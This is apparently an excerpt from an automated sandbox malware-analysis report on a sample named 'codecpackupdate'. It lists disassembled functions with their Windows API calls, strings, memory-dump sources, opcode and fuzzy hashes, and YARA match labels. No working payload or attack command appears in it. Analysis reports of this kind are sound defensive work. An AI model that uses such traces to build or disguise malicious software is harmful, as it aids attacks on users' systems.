                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 00A018BF
                                                                            • Part of subcall function 00A02413: std::exception::_Copy_str.LIBCMT ref: 00A0242C
                                                                            • Part of subcall function 00A00C90: __CxxThrowException@8.LIBCMT ref: 00A00CEE
                                                                          • std::exception::exception.LIBCMT ref: 00A0191E
                                                                          Strings
                                                                          • $, xrefs: 00A01923
                                                                          • boost unique_lock owns already the mutex, xrefs: 00A0190D
                                                                          • boost unique_lock has no mutex, xrefs: 00A018AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                          • API String ID: 2140441600-46888669
                                                                          • Opcode ID: f2d2bd60a6c7d8c02dcf324df17f3e2647ab27bc79293e4f607119ce624d0a6c
                                                                          • Instruction ID: 6b48039f3f615d647ba4c37b9347692bf0a51671951f8ece9791f3183d716c24
                                                                          • Opcode Fuzzy Hash: f2d2bd60a6c7d8c02dcf324df17f3e2647ab27bc79293e4f607119ce624d0a6c
                                                                          • Instruction Fuzzy Hash: DA2128B15083849FD720DF24D549B9BBBE4BB88708F004E2DF4A587281D7BA9548CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                          • GetLastError.KERNEL32 ref: 009F237A
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID: pqcs
                                                                          • API String ID: 1619523792-2559862021
                                                                          • Opcode ID: 91fc3320247497578c3717657b3b5a00e985e8785538cf479eb4d6bfac44c4de
                                                                          • Instruction ID: cfb13f5dbd00a0f47b4b6f220637bb2ed40155d6a838e6f493767cdbd2d60d5a
                                                                          • Opcode Fuzzy Hash: 91fc3320247497578c3717657b3b5a00e985e8785538cf479eb4d6bfac44c4de
                                                                          • Instruction Fuzzy Hash: 19F03AB0A04308ABDB20EFB49D09BBF7BBDEB44701F008169F90AD3150EAB09D058791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F4030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4035
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 009F4042
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F4049
                                                                          • std::exception::exception.LIBCMT ref: 009F4063
                                                                            • Part of subcall function 009FA5FD: __EH_prolog.LIBCMT ref: 009FA602
                                                                            • Part of subcall function 009FA5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA611
                                                                            • Part of subcall function 009FA5FD: __CxxThrowException@8.LIBCMT ref: 009FA630
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3112922283-2104205924
                                                                          • Opcode ID: 863b080c862d37beea50fa134a93033976df33c1c171026fdcc11b4e5928d803
                                                                          • Instruction ID: 4362b39bf8ccee3b4ecb65b41bba0a46daec24f57865962b689188c131fd9ab5
                                                                          • Opcode Fuzzy Hash: 863b080c862d37beea50fa134a93033976df33c1c171026fdcc11b4e5928d803
                                                                          • Instruction Fuzzy Hash: 1DF08CB1D0830DEBCB00EFE0D909BEEBB78EB08304F404158FA25A6281DB7942458B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                          • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01BC0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00A01990: CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A019E1
                                                                            • Part of subcall function 00A01990: WaitForSingleObject.KERNEL32(?,000000FF,35B6412D,?,?,?,?,35B6412D,00A01963,35B6412D), ref: 00A019F8
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A01C5E
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A01C7E
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00A01CB7
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00A01D0B
                                                                          • SetEvent.KERNEL32(?), ref: 00A01D12
                                                                            • Part of subcall function 009F418C: CloseHandle.KERNEL32(00000000,?,00A01C45), ref: 009F41B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 4166353394-0
                                                                          • Opcode ID: bc68909d21fafb026e683a578135e3f06210f19e6d558b8f2cad965ac706c189
                                                                          • Instruction ID: 568b5ccf27273b64136b022e46aa2e1822beb37c9099463e159bcbe4ec53e939
                                                                          • Opcode Fuzzy Hash: bc68909d21fafb026e683a578135e3f06210f19e6d558b8f2cad965ac706c189
                                                                          • Instruction Fuzzy Hash: 8841E1706403059FEB25CF28EC80BAB77A4EF45320F244668EC18DB2D5D735DC028BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F207C Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009F20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 009F213E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1611172436-0
                                                                          • Opcode ID: e6f397aa27f392c60730c4a4f8b466548b9a380069366d61824c25a0581f55cf
                                                                          • Instruction ID: 67d14c28b2ac81980e7d11e64a4db10a25bcfb16097dd3b502d7e6fe8ef501ba
                                                                          • Opcode Fuzzy Hash: e6f397aa27f392c60730c4a4f8b466548b9a380069366d61824c25a0581f55cf
                                                                          • Instruction Fuzzy Hash: 36319A72208705AFC310DF65C885A6BBBF9FFD8710B144A1EF59683250DB30E906CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FE02B Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE030
                                                                            • Part of subcall function 009F1A01: TlsGetValue.KERNEL32 ref: 009F1A0A
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FE0AF
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009FE0CB
                                                                          • InterlockedIncrement.KERNEL32(00A25180), ref: 009FE0F0
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009FE105
                                                                            • Part of subcall function 009F27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 009F284E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                          • String ID:
                                                                          • API String ID: 1578506061-0
                                                                          • Opcode ID: 35dd7a528a6f70003d2bab75684a9d91c09abd69916526ffd67de1445844753a
                                                                          • Instruction ID: 73882ef7c487be1c39c31a996efcbb55400adf5f66bc65814bb28f3d9a070183
                                                                          • Opcode Fuzzy Hash: 35dd7a528a6f70003d2bab75684a9d91c09abd69916526ffd67de1445844753a
                                                                          • Instruction Fuzzy Hash: 143137B1905308DFCB20DFA9D944AAEBBF8FF48310F14855EE949D7641E775AA04CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A102E4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 00A102F0
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • _free.LIBCMT ref: 00A10303
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID:
                                                                          • API String ID: 1020059152-0
                                                                          • Opcode ID: 9ac9ea5b509969901f50f362d1a581b2f37d3ca4f12bea9eea21b9228626811a
                                                                          • Instruction ID: 07ef0fd0f54d79b6cbb347d960e81d228b918bc1c898eaf51b986662e257eb7f
                                                                          • Opcode Fuzzy Hash: 9ac9ea5b509969901f50f362d1a581b2f37d3ca4f12bea9eea21b9228626811a
                                                                          • Instruction Fuzzy Hash: C4110A32904719ABDB217FB4BD0DFDB3B989F14360B114526F969CE1E0EAB488C18690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F21D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F21DA
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21ED
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 009F2224
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 009F2237
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009F2261
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                            • Part of subcall function 009F2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                            • Part of subcall function 009F2341: GetLastError.KERNEL32 ref: 009F237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: 6a5518508cbb8a1f7b1b5c4dfdef119ed416befb74571b18163acf3ee067a083
                                                                          • Instruction ID: f14af3a1252b45b1d0750124d77c4933c479ab7e5f137c2fa5920beacde5f230
                                                                          • Opcode Fuzzy Hash: 6a5518508cbb8a1f7b1b5c4dfdef119ed416befb74571b18163acf3ee067a083
                                                                          • Instruction Fuzzy Hash: 52117F72D08218DBCB15EFA8DC04AFEBBB9FF48310F10412AF92592261D7754A42DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F229D
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F22B0
                                                                          • TlsGetValue.KERNEL32 ref: 009F22E7
                                                                          • TlsSetValue.KERNEL32(?), ref: 009F2300
                                                                          • TlsSetValue.KERNEL32(?,?,?), ref: 009F231C
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                            • Part of subcall function 009F2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                            • Part of subcall function 009F2341: GetLastError.KERNEL32 ref: 009F237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: d5446eeebf9dd5180c081f664089ad1f500370416bebc607c971ad2846a42715
                                                                          • Instruction ID: e72e8bfa46c7909a1476c7fd3cde2bbb5f896cf41f6986a8116cf8ac3f1d6e9b
                                                                          • Opcode Fuzzy Hash: d5446eeebf9dd5180c081f664089ad1f500370416bebc607c971ad2846a42715
                                                                          • Instruction Fuzzy Hash: F5115EB2D04218EBCB11EFA4DC05AFEBBB9EF48750F00412AF804A3260D7754A52DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FBC45 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 009FB098: __EH_prolog.LIBCMT ref: 009FB09D
                                                                          • __CxxThrowException@8.LIBCMT ref: 009FBC62
                                                                            • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00A21D94,?,00000001), ref: 009FBC78
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009FBC8B
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,00A21D94,?,00000001), ref: 009FBC9B
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FBCA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2725315915-0
                                                                          • Opcode ID: e74c0568085ee43b753e97000f8131e162d323a14972e5ae635971840ae53489
                                                                          • Instruction ID: f19be68c04e30a6a8da5d9c728cfaad2879bb7c26eaf3f32bd136bcadf9b718b
                                                                          • Opcode Fuzzy Hash: e74c0568085ee43b753e97000f8131e162d323a14972e5ae635971840ae53489
                                                                          • Instruction Fuzzy Hash: D2016DB6604308AFDB10DFE4DD89F9B77ADEB08766B048514F665D6290DB60E8059720
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F2432
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F2445
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F2454
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2469
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 747265849-0
                                                                          • Opcode ID: 9c80e352f30340290c9f6b85e87e456b5b1f601711cedbd6aa6ca49cb9fb1fbe
                                                                          • Instruction ID: 92d4446130df1443ac07c2aaf58899690347d278af1d4a43fa44d0653d2eb8d7
                                                                          • Opcode Fuzzy Hash: 9c80e352f30340290c9f6b85e87e456b5b1f601711cedbd6aa6ca49cb9fb1fbe
                                                                          • Instruction Fuzzy Hash: 7BF01772204214BBD710EBE0ED89FEAB72DFB49711F809025F701D6491D7A1A922CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 009F1ED2
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 009F1EEA
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F1EF9
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F1F0E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F1F15
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 830998967-0
                                                                          • Opcode ID: 09779e761dc5526172984337db69a00b280e00f0075c4898c69bfdec6b290ea6
                                                                          • Instruction ID: 0f40a5dcd0a0dcbfafd1cd338f6e939dc22c42da48e4fa3692aea25f5247630d
                                                                          • Opcode Fuzzy Hash: 09779e761dc5526172984337db69a00b280e00f0075c4898c69bfdec6b290ea6
                                                                          • Instruction Fuzzy Hash: 45F01772205605BBD700EFA1ED88FDABB3DFF58351F005016F60196451DB61AA268BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A00800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 009F9A0C: __EH_prolog.LIBCMT ref: 009F9A11
                                                                            • Part of subcall function 009F9A0C: _Allocate.LIBCPMT ref: 009F9A68
                                                                            • Part of subcall function 009F9A0C: _memmove.LIBCMT ref: 009F9ABF
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 00A008E2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 00A008EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                                          • String ID: Unknown error$invalid string position
                                                                          • API String ID: 1017912131-1837348584
                                                                          • Opcode ID: cd625b08bfda2b3d90d19e2cbeb51ed3c449ba4e8a4a14fc1cf086040725435e
                                                                          • Instruction ID: bf659197332dec50caf3d59dec5e8209dba17022c292d00dd7dec614cac3dace
                                                                          • Opcode Fuzzy Hash: cd625b08bfda2b3d90d19e2cbeb51ed3c449ba4e8a4a14fc1cf086040725435e
                                                                          • Instruction Fuzzy Hash: 2F51BA702083459FEB14CF24D890F2FBBE4BB98384F50092EF481976D2D771E5898B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F8682 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: invalid string position$string too long
                                                                          • API String ID: 4104443479-4289949731
                                                                          • Opcode ID: f4f2029c5868a4d92ed49e601de36cc680286bd7d337394bc07fb70e70c2a6a5
                                                                          • Instruction ID: cb026525c23714403e9f59b849f7e8e5494f81fa3b4a28288b47f18ab4468e8a
                                                                          • Opcode Fuzzy Hash: f4f2029c5868a4d92ed49e601de36cc680286bd7d337394bc07fb70e70c2a6a5
                                                                          • Instruction Fuzzy Hash: 1F418331300309ABDB74AE69D895B77B7AEEF41714B24092DEA56CB381CB70E944CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F30AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F30C3
                                                                          • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 009F3102
                                                                          • _memcmp.LIBCMT ref: 009F3141
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressErrorLastString_memcmp
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 1618111833-2422070025
                                                                          • Opcode ID: 43a1f9d25660d8a54e4b371ddbb383961b0cfb1167a804ebefb6e393167cb79f
                                                                          • Instruction ID: e21f21ed7971d7818bab5d4d9e18c8d4d61d0b8afb4c6610c0d3bd0f5ca04f61
                                                                          • Opcode Fuzzy Hash: 43a1f9d25660d8a54e4b371ddbb383961b0cfb1167a804ebefb6e393167cb79f
                                                                          • Instruction Fuzzy Hash: 2631D3B1B0430CDFDB20DF64C880BBEB7B9BF45321F108569E9699B280DB759A418B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F1F5B
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 009F1FC5
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 009F1FD2
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                          • String ID: iocp
                                                                          • API String ID: 998023749-976528080
                                                                          • Opcode ID: 186de4a6d3ad93fb44641f4ce3e65ea28f08f258f3720d17aeb3d5b9aa9b6c0a
                                                                          • Instruction ID: 899751423531298394c19ffdbf0a299a3ec3fb73586e616e77e52d580231d75d
                                                                          • Opcode Fuzzy Hash: 186de4a6d3ad93fb44641f4ce3e65ea28f08f258f3720d17aeb3d5b9aa9b6c0a
                                                                          • Instruction Fuzzy Hash: 9A21EAB1801B44DFC720DF6AC50059AFBF8FF94710B108A1FE5A683A50D7B0A644CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A03A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • std::exception::exception.LIBCMT ref: 00A03AC5
                                                                          • __CxxThrowException@8.LIBCMT ref: 00A03ADA
                                                                            • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
